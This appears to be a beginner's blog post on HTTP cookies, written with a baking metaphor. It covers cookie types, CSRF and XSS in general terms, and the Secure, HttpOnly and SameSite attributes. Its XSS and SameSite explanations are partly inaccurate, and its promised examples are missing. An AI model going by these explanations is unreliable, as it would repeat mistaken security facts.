Cookies

6 min readNov 4, 2020

The Delicious Guards

What if you found out that there were hundreds of cookies hidden somewhere in your house?

Breaking out your inner child, you’d likely rush off to find them.

Unfortunately, these hidden cookies are not ones that you can see, or even eat. They are computer cookies, and they affect your online identity.

Cookies were cooked by Lou Montulli by using the recipe of “magic cookies” (an old computing term that refers to packets of information that are sent and received in internal networks) in web communication in 1994.

What is a cookie?

A cookie is a small text file that is stored by a browser on the user’s machine.

Cookies are plain text, they contain no executable code.

A web page or server instructs a browser to store this information and then send it back with each subsequent request based on a set of rules. They hold a very small amount of data at a maximum capacity of 4KB.

Who creates cookies?

While it’s possible to create cookies in the browser with document.cookie, most of the times it's responsibility of the backend to set cookies in the response before sending it to the client, as cookies are used for authenticating a user. By backend here we mean that cookies can be created by:

the actual application’s code on the backend
a webserver responding to requests (Nginx, Apache)

For doing so the backend sets in the response with a string made of a key/value pair.

An Analog to Cookies

You can imagine Cookies as an Employee ID card. When you join a company, you will receive the ID card, with an ID. Every time you wish to enter the company, the ID needs to be presented at the security gate. And, when you leave the company for good, you will no longer be related to the ID.

Cookies Different Flavours

Types of Cookies (Session Cookie vs Persistent Cookie)

First of all, decide how long your cookies can remain fresh.

The more sensitive the data, the sooner it should expire.

If a cookie does not contain an expiration date, it is considered a session cookie. Session cookies are stored in memory and never written to disk. When the browser closes, the cookie is permanently lost from this point on. If the cookie contains an expiration date, it is considered a persistent cookie. On the date specified in the expiration, the cookie will be removed from the disk.

Websites use HTTP cookies to streamline users web experiences. Cookies are intended to be used for the following purposed:

Session management: For example, cookies let websites recognize users and recall their individual login information.
Personalisation: Customized advertising is the main way cookies are used to personalize your sessions.
Tracking: Shopping sites use cookies to track items users previously viewed, allowing the sites to suggest other goods they might like and keep items in shopping carts while they continue shopping.

Cookies can be accessed in the following ways.

Using javascript

Left Click > Inspect Element > Console > document.cookie

Using Browser

Left Click > Inspect Element > Storage > Cookies

Bittersweet Cookies

Cookie can turn bitter as the contents are usually very interesting to hackers. Hackers have ways to access information residing inside the cookies. Following are the two types of attacks which are performed to hijack cookies.

Cross Site Request Forgery Attack (XSRF)

A browser sends a cookie in response to a request, regardless of where the request came from. This is where the actual problem with cookies comes in. When a website receives a request, it cannot distinguish whether the action is initiated by the user or not. It looks for the cookie and, if the cookie is available, it deliberately performs the action as if the user initiated it. This can be explained by using an example.

Cross-Site Scripting (XSS)

In order to carry out a cross-site scripting exploit, an attacker has to place the exploit in a cookie. Then the exploit vector will fetch the payload from the cookie and the exploitation is carried out. This type of attack will become difficult if the cookie has already been set; in this case, the attacker has to control the first cookie in the cookie string and only then can the attack be carried out.

Making Cookies Delicious Again

Adding Security Ingredients to Cookies

To make sure that cookies are not bitter some security ingredients are added while creating a cookie.

Ingredient 1: Secure

Adding this parameter makes sure the cookie can only be transmitted securely over HTTPS, and it will not be sent over unencrypted HTTP connections:

Ingredient 2: HttpOnly

This item makes cookies inaccessible via the document.cookie API, so they are only editable by the server:

Ingredient 3: SameSite

This portion lets servers require that a cookie is not sent on cross-site requests, but only on resources that have the cookie domain as the origin, which should be a great help towards reducing the risk of CSRF (Cross Site Request Forgery) attacks. The following can values can be set for SameSite-

‘lax’ enables only first-party cookies to be sent/accessed
‘strict’ is a subset of ‘lax’ and won’t fire if the incoming link is from an external site
‘none’ signals that the cookie data can be shared with third parties/external sites

Ingredient 4: Encryption

Encryption is the most important of all. The encryption keys is stored on the server. Only the server can decrypt the cookie, and can make predictable changes to the cookie. An attacker can make changes to the cyphertext of the cookie, but they cannot know in advance what effect those changes will have. If the cookie additionally includes an anti-tampering measure, then an attacker cannot make changes to an encrypted cookie without invalidating it.

To add the cherry on the top make sure to clear everything before logging out of the website. Use Session cookies if possible. Otherwise set a strict expiration. The expiration will let the server knows what it can digest and what it can not.